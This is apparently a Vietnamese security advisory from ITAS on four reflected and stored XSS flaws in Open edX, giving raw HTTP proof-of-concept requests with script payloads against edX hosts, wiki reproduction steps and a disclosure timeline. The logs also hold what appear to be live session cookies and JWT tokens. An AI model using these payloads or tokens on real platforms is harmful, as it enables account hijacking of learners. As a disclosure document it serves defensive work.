ITAS SECURITY TEAM PHÁT HIỆN NHIỀU LỖ HỔNG BẢO MẬT TRÊN HỆ THỐNG HỌC TRỰC TUYẾN OPEN EDX

Open eDX (https://github.com/edx/edx-platform) là hệ thống đào tạo trực tuyến được phát triển bởi Havard và MIT từ năm 2012. Open eDX được sử dụng bởi nhiều tổ chức quốc tế như Microsoft, IBM, đại học Harvard, đại học MIT, đại học Stanford và các tổ chức khác trên thế giới. Trong quá trình kiểm tra bảo mật cho khách hàng sử dụng hệ thống Open eDX, ITAS SECURITY TEAM đã phát hiện ra một số lỗ hổng bảo mật ở trong mã nguồn Open eDX (Hawthorn.2 release 06/29/2018 ). Các lỗ hổng bao gồm Stored Cross Site Scripting (Stored XSS) và Reflected Cross Site Scripting (Reflected XSS). Hacker có thể lợi dụng lỗ hổng bảo mật này để tấn công người dùng hệ thống Open eDX.

Itas Security team đã gửi thông tin các lỗi này cho vendor để sửa lỗi. Open EDX Team phản hồi email về Itas team với nội dung như sau:

“Sau khi ITAS Security Team thông báo cho EdX về các lỗ hổng bảo mật, EdX đã kiểm tra và xác nhận tổng cộng 4 lỗi bảo mật CAT-1. ITAS Team tiếp tục hỗ trợ quá trình kiểm tra các lỗi  vẫn còn lần thứ hai. Để bày tỏ sự đánh giá cao của họ, EdX đã cung cấp cho ITAS Team phần thưởng trị giá $600 USD. Từ phản hồi của EdX với ITAS: “Cảm ơn bạn rất nhiều vì đã làm việc chăm chỉ để edx.org an toàn hơn cho hàng triệu người học trên toàn thế giới. Là một công ty nguồn mở phi lợi nhuận, chúng tôi thực sự đánh giá cao bạn dành thời gian để tìm và tiết lộ những vấn đề này chúng tôi trực tiếp”

Cross Site Scripting còn được biết đến với tên XSS là lỗi thứ 7 trong TOP 10 -2017 của tổ chức OWASP (https://www.owasp.org/index.php/Top_10-2017_A7-Cross-Site_Scripting_(XSS)). Thông qua lỗ hổng XSS hacker sẽ chèn các mã độc vào mã nguồn của ứng dụng từ đó ăn cắp phiên giao dịch, tương tác với browser của người dùng và có thể phát triển thêm các dạng tấn công khác đến người dùng cuối.

Trong quá trình khảo sát, chúng tôi nhận thấy rằng các hệ thống học trực tuyến sử dụng phiên bản lỗi đều có nguy cơ bị tấn công và khai thác, đơn cử một số site sau đây:

  • https://courses.edx.org
  • https://openedx.microsoft.com
  • https://openedx.gse.harvard.edu
  • https://lagunita.stanford.edu
  • https://lms.mitx.mit.edu
  • https://university.redislab.com
  • https://openedx.open.ac.uk/
  • https://campus.gov.il
  • https://demo.edunext.io/

1. Thông Tin Ứng Dụng

Vendor : https://open.edx.org/
Download link: https://github.com/edx/edx-platform
Vulnerable version: Hawthorn.2
Fixed version: Ironwood.3
Release date: 2019-02-27

2. Thông Tin Lỗ Hỏng Bảo Mật

a. Template – URL Cross Site Scripting

Vulnerability name : Reflected Cross Site Scripting
Demonstration site: https://openedx.microsoft.com/template
Affected URL : https://openedx.microsoft.com/template/{PAYLOAD}
Payload: <script>alert(“XSS”)</script>
Parameter type: GET
Vulnerable function: show_reference_template
Fixed link: https://github.com/edx/edx-platform/pull/19615

Proof of concept

Request

GET /template/<script>alert(‘XSS’)</script> HTTP/1.1
Host: courses.edx.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response

HTTP/1.1 404 Not Found
Content-Language: en
Content-Type: text/html; charset=utf-8
Date: Mon, 17 Dec 2018 09:03:38 GMT
Server: nginx
Vary: Accept-Encoding
Vary: Accept-Language, Cookie
X-Frame-Options: DENY
Content-Length: 46
Connection: Close

Missing template <script>alert(‘XSS’)</script>

Video

b. Xblock – Reflected Cross Site Scripting

Vulnerability name : Reflected Cross Site Scripting
Demonstration site: https://openedx.microsoft.com/template
Affected URL : https://openedx.microsoft.com/template/{PAYLOAD}
Payload: <script>alert(“XSS”)</script>
Parameter type: GET
Vulnerable function: show_reference_template
Fixed link: https://github.com/edx/edx-platform/pull/19615

Proof of concept

Request

GET /xblock/block-v1:edX+DemoX+Demo_Course+type@vertical+block@vertical?view=<script>alert(“XSS”)</script>
HTTP/1.1
Host: courses.edx.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response

HTTP/1.1 400 Bad Request
Cache-control: no-cache=”set-cookie”
Content-Language: en
Content-Type: text/html; charset=utf-8
Date: Mon, 17 Dec 2018 09:15:49 GMT
Server: nginx
Set-Cookie: AWSELB=D1EF6B6510E347E5B895826CD53CF4FD55E0CFA9A9FFA4D0509C04A79307C543BC7A564BF3102652C9DDBF45788A0111B01830935A583EAE591F65FD084E6693F1009EDC31;PATH=/;MAX-AGE=120
Vary: Accept-Language, Cookie
Content-Length: 78
Connection: Close

Rendering of the xblock view ‘<script>alert(‘XSS’)</script>’ is not supported.

Video

 

c. Certificate – Reflected Cross Site Scripting

Vulnerability name: Reflected Cross-site Scripting
Affected URL: http://localhost/certificates/search/?user={PAYLOAD}
Sample attack pattern: <script>alert(‘XSS’)<script>
Parameter name: user
Parameter Type: GET
Github link: https://github.com/edx/edx-platform/blob/master/lms/djangoapps/certificates/views/support.py
Vulnerable function: search_certificates(request), line 91
Condition to attack: Required staff role or higher
Fixed link: https://github.com/edx/edx-platform/pull/19519

Proof of concept

Request

GET /certificates/search/?user=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: csrftoken=YexdtVBq17ovoP4JX4z0JVJprr7Jwt8m5ftnkPEztOkctN0BjVUMtWcDxcID3Fbc; experiments_is_enterprise=false; openedx-language-preference=en; edxloggedin=true; sessionid=”1|ud7b2zkplcv2zzrbkkk06wtkq6ced7tp|qtpnFD16krkG|IjQ2MTA5N2NmNGEwOWFkNjNjNzJjNDg1MGQ4NDE5MTc1YTNiYTAwYTYzYmQ2NDg0NjgwYWQ3NDk4OTVhNDFmYzQi:1gYpH7:wa4qHQbmWjRbERxcmREcFCezcec”; edx-user-info=”{\”username\”: \”staff\”\054 \”version\”: 1\054 \”enrollmentStatusHash\”: \”09d498ab1dd69884525f4cdfa9cca6a6\”\054 \”header_urls\”: {\”learner_profile\”: \”http://192.168.1.238/u/staff\”\054 \”resume_block\”: \”http://192.168.1.238/dashboard\”\054 \”logout\”: \”http://192.168.1.238/logout\”\054 \”account_settings\”: \”http://192.168.1.238/account/settings\”}}”
Upgrade-Insecure-Requests: 1

Response

HTTP/1.1 400 Bad Request
Server: nginx
Date: Mon, 17 Dec 2018 09:34:29 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 51
Connection: close
Vary: Accept-Language, Cookie
X-Frame-Options: ALLOW
Content-Language: en
Set-Cookie: openedx-language-preference=en; expires=Mon, 31-Dec-2018 09:34:29 GMT; Max-Age=1209600; Path=/

user ‘<script>alert(‘XSS’)</script>’ does not exist

Video

 

d. Wiki – Stored Cross Site Scripting

Vulnerability name: Stored Cross-site Scripting
Affected URL : https://courses.edx.org/courses/{Course_id}/course_wiki
Sample attack pattern : <script>alert(‘XSS’)<script>
Parameter name : content
Parameter Type : POST
Step to reproduce : Login as student user and following the step below

Step 1: Access course wiki by adding course_wiki at the end of course URL (No matter that the course has a wiki or not. E.g: https://courses.edx.org/courses/course-v1:AdelaideX+ProgramX+3T2018/course_wiki)

Step 2: Click Edit button and put XSS payload(<script>alert(‘XSS’)</script>) into wiki content then save it.

Step 3: Payload popup on https://courses.edx.org/wiki/{Course-id}/ (E.g: https://courses.edx.org/wiki/course-v1:AdelaideX+ProgramX+3T2018/)

Proof of concept

Request 1

GET /courses/course-v1:AdelaideX+ProgramX+3T2018/course_wiki HTTP/1.1
Host: courses.edx.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: __cfduid=dd721431718a63918f0bf0852e5ef08a61542883934; csrftoken=TfcOjleCHqbyXGJxLOPdkRTwsLD6iixrgr35L54daxwvAzYi7b1vw5lx9ocibtSw; optimizelyEndUserId=oeu1543736784624r0.18289740247694908; ajs_user_id=%2221697598%22; ajs_group_id=null; ajs_anonymous_id=%2233ce0d14-baab-4869-b1a2-0e550cc66925%22; ki_t=1543736796101%3B1543806787761%3B1543819835121%3B2%3B50; prod-edx-cookie-policy-viewed=true; experiments_is_enterprise=false; sailthru_hid=a0c772079f0b6ed2de5109edefd437855c04a0ec20122e70f812a608c5d1304171706d82698352ffec62a6ae; prod-edx-language-preference=en; prod-edx-csrftoken=vCmAAKia73Q0PvtiRSICwRGHQoBQ3Xbcph0MDeLZASiaQkWa8OaoSwROinyiDVl9; prod-edx-sessionid=”1|cpe7mabx3xu2f9iin3hvwuasknkzyqr0|LhDSMPmPeLXm|ImJmYmEyOGU2YjEyYWU1MmE0ZjU3N2Q5MWM5YjFiNTlhOGI4YTYyMDg0MDkxMGQwMWJkYmVjMWI5NmJiNWE4MzYi:1gW1c1:CRVkyoeUJrFVDvv05frdTNMWZs0″; edxloggedin=true; edx-jwt-cookie-header-payload=eyJhbGciOiJSUzUxMiIsImtpZCI6Imxtc3Byb2QwMDEifQ.eyJzY29wZXMiOiBbImVtYWlsIiwgInByb2ZpbGUiXSwgImFkbWluaXN0cmF0b3IiOiBmYWxzZSwgInByZWZlcnJlZF91c2VybmFtZSI6ICJzdHVkZW50ZGVtbzEiLCAiZmlsdGVycyI6IFsidXNlcjptZSJdLCAiaWF0IjogMTU0NDM3MTYzMCwgInN1YiI6ICIxZmE2NjViMmRjNmYxZWQ3OGExNGQ0MjZmYjk0YjQ1YyIsICJmYW1pbHlfbmFtZSI6ICIiLCAiYXVkIjogInJpbm15YnllZG51YXc1cGhsaWRDb2NEdWRieWxiT2JEaWJKb2Rib3NnZXRzRWJhbGQ0IiwgImlzcyI6ICJodHRwczovL2NvdXJzZXMuZWR4Lm9yZy9vYXV0aDIiLCAiZW1haWxfdmVyaWZpZWQiOiB0cnVlLCAibmFtZSI6ICJzdHVkZW50ZGVtbzEiLCAidmVyc2lvbiI6ICIxLjEuMCIsICJnaXZlbl9uYW1lIjogIiIsICJleHAiOiAxNTQ0Mzc1MjMwLCAiaXNfcmVzdHJpY3RlZCI6IGZhbHNlLCAiZW1haWwiOiAic3R1ZGVudGRlbW8xQG1haWxpbmF0b3IuY29tIn0; edx-jwt-cookie-signature=lqvrwBViGUEij8AKc8FlWd1oa99bDtNGkmVkuobGLhE43W6qrEg2IvfzojsZnFgQiqJ3Be2D4Xp93of_qdo0AwP8EvwMdDEukqxJ68dMgFxa7e7gfLbhnCiGPYpLfdEywCQk_UerlrkPgz3WXO8hORydaNwD-bpe_yRpamZHburWw4DYJZjYIYRVaiHHc6KcaERQQLphQrD0zghp4sbd-nCIOfQcMy9mjE80Aq5jQydPJXUAlFcxC14XlR8x63P8WEV5Y0mUkEpud6wm3TnK_8oE8aCXk8OepYs1qSAtLj2tuBdSlVwuGqMkHtyTSYBchYjOAkMCQ6098POiTsLKDg; edx-jwt-refresh-cookie=B36A3caqItGpd80pKcNJKeL9fv51Os; prod-edx-user-info=”{\”username\”: \”studentdemo1\”\054 \”version\”: 1\054 \”enrollmentStatusHash\”: \”02c23d94693a6636ea722152eab98136\”\054 \”header_urls\”: {\”learner_profile\”: \”https://courses.edx.org/u/studentdemo1\”\054 \”resume_block\”: \”https://courses.edx.org/dashboard\”\054 \”logout\”: \”https://courses.edx.org/logout\”\054 \”account_settings\”: \”https://courses.edx.org/account/settings\”}}”
Upgrade-Insecure-Requests: 1

Response 1

HTTP/1.1 302 Found
Cache-control: no-cache=”set-cookie”
Content-Language: en
Content-Type: text/html; charset=utf-8
Date: Sun, 09 Dec 2018 16:08:03 GMT
Location: /wiki/AdelaideX.Code101x.3T2015/
P3P: CP=”edX does not have a P3P policy. Review our privacy policy at https://edx.org/privacy”
Server: nginx
Set-Cookie: prod-edx-language-preference=en; Domain=.edx.org; expires=Sun, 23-Dec-2018 16:08:03 GMT; Max-Age=1209600; Path=/
Set-Cookie: AWSELB=D1EF6B6510E347E5B895826CD53CF4FD55E0CFA9A93C0FAA65DA3F08F760218CFB1EAA2596E2F643BD06A9A0A502731C115A29A9CB909D18A431441A942FF35DD4A76CC255;PATH=/;MAX-AGE=120
Strict-Transport-Security: max-age=3600
Vary: Accept-Language, Cookie
X-Frame-Options: DENY
Content-Length: 0
Connection: Close

Resquest 2

POST /wiki/AdelaideX.Code101x.3T2015/_edit/ HTTP/1.1
Host: courses.edx.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://courses.edx.org/wiki/AdelaideX.Code101x.3T2015/_edit/
Content-Type: multipart/form-data; boundary=—————————112257516914770264881620708143
Content-Length: 954
DNT: 1
Connection: close
Cookie: __cfduid=dd721431718a63918f0bf0852e5ef08a61542883934; csrftoken=TfcOjleCHqbyXGJxLOPdkRTwsLD6iixrgr35L54daxwvAzYi7b1vw5lx9ocibtSw; optimizelyEndUserId=oeu1543736784624r0.18289740247694908; ajs_user_id=%2221697598%22; ajs_group_id=null; ajs_anonymous_id=%2233ce0d14-baab-4869-b1a2-0e550cc66925%22; ki_t=1543736796101%3B1543806787761%3B1543819835121%3B2%3B50; prod-edx-cookie-policy-viewed=true; experiments_is_enterprise=false; sailthru_hid=a0c772079f0b6ed2de5109edefd437855c04a0ec20122e70f812a608c5d1304171706d82698352ffec62a6ae; prod-edx-language-preference=en; prod-edx-csrftoken=vCmAAKia73Q0PvtiRSICwRGHQoBQ3Xbcph0MDeLZASiaQkWa8OaoSwROinyiDVl9; prod-edx-sessionid=”1|cpe7mabx3xu2f9iin3hvwuasknkzyqr0|LhDSMPmPeLXm|ImJmYmEyOGU2YjEyYWU1MmE0ZjU3N2Q5MWM5YjFiNTlhOGI4YTYyMDg0MDkxMGQwMWJkYmVjMWI5NmJiNWE4MzYi:1gW1c1:CRVkyoeUJrFVDvv05frdTNMWZs0″; edxloggedin=true; edx-jwt-cookie-header-payload=eyJhbGciOiJSUzUxMiIsImtpZCI6Imxtc3Byb2QwMDEifQ.eyJzY29wZXMiOiBbImVtYWlsIiwgInByb2ZpbGUiXSwgImFkbWluaXN0cmF0b3IiOiBmYWxzZSwgInByZWZlcnJlZF91c2VybmFtZSI6ICJzdHVkZW50ZGVtbzEiLCAiZmlsdGVycyI6IFsidXNlcjptZSJdLCAiaWF0IjogMTU0NDM3MTYzMCwgInN1YiI6ICIxZmE2NjViMmRjNmYxZWQ3OGExNGQ0MjZmYjk0YjQ1YyIsICJmYW1pbHlfbmFtZSI6ICIiLCAiYXVkIjogInJpbm15YnllZG51YXc1cGhsaWRDb2NEdWRieWxiT2JEaWJKb2Rib3NnZXRzRWJhbGQ0IiwgImlzcyI6ICJodHRwczovL2NvdXJzZXMuZWR4Lm9yZy9vYXV0aDIiLCAiZW1haWxfdmVyaWZpZWQiOiB0cnVlLCAibmFtZSI6ICJzdHVkZW50ZGVtbzEiLCAidmVyc2lvbiI6ICIxLjEuMCIsICJnaXZlbl9uYW1lIjogIiIsICJleHAiOiAxNTQ0Mzc1MjMwLCAiaXNfcmVzdHJpY3RlZCI6IGZhbHNlLCAiZW1haWwiOiAic3R1ZGVudGRlbW8xQG1haWxpbmF0b3IuY29tIn0; edx-jwt-cookie-signature=lqvrwBViGUEij8AKc8FlWd1oa99bDtNGkmVkuobGLhE43W6qrEg2IvfzojsZnFgQiqJ3Be2D4Xp93of_qdo0AwP8EvwMdDEukqxJ68dMgFxa7e7gfLbhnCiGPYpLfdEywCQk_UerlrkPgz3WXO8hORydaNwD-bpe_yRpamZHburWw4DYJZjYIYRVaiHHc6KcaERQQLphQrD0zghp4sbd-nCIOfQcMy9mjE80Aq5jQydPJXUAlFcxC14XlR8x63P8WEV5Y0mUkEpud6wm3TnK_8oE8aCXk8OepYs1qSAtLj2tuBdSlVwuGqMkHtyTSYBchYjOAkMCQ6098POiTsLKDg; edx-jwt-refresh-cookie=B36A3caqItGpd80pKcNJKeL9fv51Os; prod-edx-user-info=”{\”username\”: \”studentdemo1\”\054 \”version\”: 1\054 \”enrollmentStatusHash\”: \”02c23d94693a6636ea722152eab98136\”\054 \”header_urls\”: {\”learner_profile\”: \”https://courses.edx.org/u/studentdemo1\”\054 \”resume_block\”: \”https://courses.edx.org/dashboard\”\054 \”logout\”: \”https://courses.edx.org/logout\”\054 \”account_settings\”: \”https://courses.edx.org/account/settings\”}}”; AWSELB=D1EF6B6510E347E5B895826CD53CF4FD55E0CFA9A93C0FAA65DA3F08F760218CFB1EAA2596E2F643BD06A9A0A502731C115A29A9CB909D18A431441A942FF35DD4A76CC255
Upgrade-Insecure-Requests: 1

—————————–112257516914770264881620708143
Content-Disposition: form-data; name=”csrfmiddlewaretoken”

CK0hVpI1d4KR43siLr4ssdOe8sKg1y6GZWRyn9yCGb5OHWH37OgKErgfP5jsUJrL
—————————–112257516914770264881620708143
Content-Disposition: form-data; name=”title”

Programming for Data Science
—————————–112257516914770264881620708143
Content-Disposition: form-data; name=”content”

This is the wiki for **AdelaideX**’s _Programming for Data Science_.
<script>alert(‘XSS’)</script>
—————————–112257516914770264881620708143
Content-Disposition: form-data; name=”summary”

—————————–112257516914770264881620708143
Content-Disposition: form-data; name=”current_revision”

89992
—————————–112257516914770264881620708143
Content-Disposition: form-data; name=”save”

1
—————————–112257516914770264881620708143–

Response 2

HTTP/1.1 302 Found
Content-Language: en
Content-Type: text/html; charset=utf-8
Date: Sun, 09 Dec 2018 16:08:45 GMT
Location: /wiki/AdelaideX.Code101x.3T2015/
P3P: CP=”edX does not have a P3P policy. Review our privacy policy at https://edx.org/privacy”
Server: nginx
Set-Cookie: prod-edx-language-preference=en; Domain=.edx.org; expires=Sun, 23-Dec-2018 16:08:45 GMT; Max-Age=1209600; Path=/
Set-Cookie: prod-edx-sessionid=”1|cpe7mabx3xu2f9iin3hvwuasknkzyqr0|EPbOgM6D4T9p|ImJmYmEyOGU2YjEyYWU1MmE0ZjU3N2Q5MWM5YjFiNTlhOGI4YTYyMDg0MDkxMGQwMWJkYmVjMWI5NmJiNWE4MzYi:1gW1dN:kxL_2U1JA0cAvinLbyXEfZppkvY”; Domain=.edx.org; expires=Sun, 06-Jan-2019 16:08:45 GMT; httponly; Max-Age=2419200; Path=/; secure
Strict-Transport-Security: max-age=3600
Vary: Accept-Language, Cookie
X-Frame-Options: DENY
Content-Length: 0
Connection: Close

Request 3

GET /wiki/AdelaideX.Code101x.3T2015/ HTTP/1.1
Host: courses.edx.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://courses.edx.org/wiki/AdelaideX.Code101x.3T2015/_edit/
DNT: 1
Connection: close
Cookie: prod-edx-sessionid=”1|7ahalk3pygy48xh6l70e6j4ia96n4zet|IkblSszTjSXs|ImI5Y2FjMmY2YjZhOTk0NGVhZjBhMmE4NDFkMDA0ZDYwNDRiZDk5OTcyZTgzNGEzZjBiYmQ2MzIxYTg1OTRkNjAi:1gWg0X:V-pHtUuxjSFjVnSWN2DHssjuAYI”; csrftoken=wrJd3S6iaVCkkHNEQVVqTUywZaLtftQCZcLZiHxOD1P6NqPO443rAJTU8RelRJps; __cfduid=de755c9ba6493ba36d514c937c9f5528b1544526347; optimizelyEndUserId=oeu1544526349200r0.564235344454921; ajs_user_id=%2221697598%22; ajs_group_id=null; ajs_anonymous_id=%22de57a2d3-488b-4ada-960a-c6af0997df5b%22; experiments_is_enterprise=false; ki_t=1544526815310%3B1544526815310%3B1544526855356%3B1%3B2; edxloggedin=true; sailthru_hid=a0c772079f0b6ed2de5109edefd437855c04a0ec20122e70f812a608c5d1304171706d82698352ffec62a6ae; edx-jwt-cookie-header-payload=eyJhbGciOiJSUzUxMiIsImtpZCI6Imxtc3Byb2QwMDEifQ.eyJzY29wZXMiOiBbImVtYWlsIiwgInByb2ZpbGUiXSwgImFkbWluaXN0cmF0b3IiOiBmYWxzZSwgInByZWZlcnJlZF91c2VybmFtZSI6ICJzdHVkZW50ZGVtbzEiLCAiZmlsdGVycyI6IFsidXNlcjptZSJdLCAiaWF0IjogMTU0NDUyNjgyNCwgInN1YiI6ICIxZmE2NjViMmRjNmYxZWQ3OGExNGQ0MjZmYjk0YjQ1YyIsICJmYW1pbHlfbmFtZSI6ICIiLCAiYXVkIjogInJpbm15YnllZG51YXc1cGhsaWRDb2NEdWRieWxiT2JEaWJKb2Rib3NnZXRzRWJhbGQ0IiwgImlzcyI6ICJodHRwczovL2NvdXJzZXMuZWR4Lm9yZy9vYXV0aDIiLCAiZW1haWxfdmVyaWZpZWQiOiB0cnVlLCAibmFtZSI6ICJzdHVkZW50ZGVtbzEiLCAidmVyc2lvbiI6ICIxLjEuMCIsICJnaXZlbl9uYW1lIjogIiIsICJleHAiOiAxNTQ0NTMwNDI0LCAiaXNfcmVzdHJpY3RlZCI6IGZhbHNlLCAiZW1haWwiOiAic3R1ZGVudGRlbW8xQG1haWxpbmF0b3IuY29tIn0; edx-jwt-cookie-signature=kHy194pQ77QiK-gwvWsvIZvBvCHfRrJedvWHyS3SvONFx-ui8sXhZ2vZ0crVVjl-LHw9No30E_GSTmSOIiZ6Szu9MJm-0eFlOVLXziztwS7XcmfF8U2yBcLck40MuqlxLAIwAxjSDSbMNCJE0oKeNzUrFqUnTJuRYcqHmXiIHiK07hTQosEFMOXThirlJqTPFndnRUC3ZLHEsR6zlIcjW94hv_8VX3Ghf-nHGAq7t-E3b8EZgMOWw52vVKoL0xDLHSMphKVceX9w2GPzKSVUop3S5WK8yPJO3F5Zsjtj8F_ll7zeY-r-FTBqBo1MuRaQAdmQhCl0NIujNTsEEa-GKg; prod-edx-language-preference=en; edx-jwt-refresh-cookie=QplV797j5qcL5sqThFjeA4o8BwHQFN; prod-edx-user-info=”{\”username\”: \”studentdemo1\”\054 \”version\”: 1\054 \”enrollmentStatusHash\”: \”02c23d94693a6636ea722152eab98136\”\054 \”header_urls\”: {\”learner_profile\”: \”https://courses.edx.org/u/studentdemo1\”\054 \”resume_block\”: \”https://courses.edx.org/dashboard\”\054 \”logout\”: \”https://courses.edx.org/logout\”\054 \”account_settings\”: \”https://courses.edx.org/account/settings\”}}”; prod-edx-cookie-policy-viewed=true
Upgrade-Insecure-Requests: 1

Response 3

HTTP/1.1 200 OK
Cache-control: no-cache=”set-cookie”
Content-Language: en
Content-Type: text/html; charset=utf-8
Date: Tue, 11 Dec 2018 11:23:58 GMT
P3P: CP=”edX does not have a P3P policy. Review our privacy policy at https://edx.org/privacy”
Server: nginx
Set-Cookie: csrftoken=wrJd3S6iaVCkkHNEQVVqTUywZaLtftQCZcLZiHxOD1P6NqPO443rAJTU8RelRJps; expires=Tue, 10-Dec-2019 11:23:58 GMT; Max-Age=31449600; Path=/; secure
Set-Cookie: prod-edx-language-preference=en; Domain=.edx.org; expires=Tue, 25-Dec-2018 11:23:58 GMT; Max-Age=1209600; Path=/
Set-Cookie: AWSELB=D1EF6B6510E347E5B895826CD53CF4FD55E0CFA9A90749CECFD3E3A420861CE2F36D6BE86B832CBCF80A5BC96B29B65129A6F54A14F6993CFC88318D16B35C6A99B60FC936;PATH=/;MAX-AGE=120
Strict-Transport-Security: max-age=3600
Vary: Accept-Encoding
Vary: Accept-Language, Cookie
X-Frame-Options: DENY
Content-Length: 37551
Connection: Close

……….SNIPPET……….
<div class=”wiki-article”>
<p>This is the wiki for <strong>AdelaideX</strong>’s <em>Programming for Data Science</em>.
<script>alert(‘XSS’)</script></p>
</div>
……….SNIPPET……….

Video

 

Tuyên bố miễn trừ trách nhiệm
Tác giả không chịu trách nhiệm cho bất kỳ việc lạm dụng thông tin ở trên đây và không chịu trách nhiệm cho bất kỳ thiệt hại nào do việc sử dụng hoặc sử dụng sai mục đích các hướng dẫn này. Tác giả nghiêm cấm mọi hành vi sử dụng  các lỗi bảo mật ở trên để khai thác và gây thiệt hại cho các tổ chức ở trên và các tổ chức khác.

Tiết Lộ Thông Tin
+ 26/11/2018: phát hiện lỗi bảo mật
+ 26/12/2018: gửi thông tin cho nhà phát triển ứng dụng
+ 18/4/2019  : công bố thông tin

/ Blog / Tags: , ,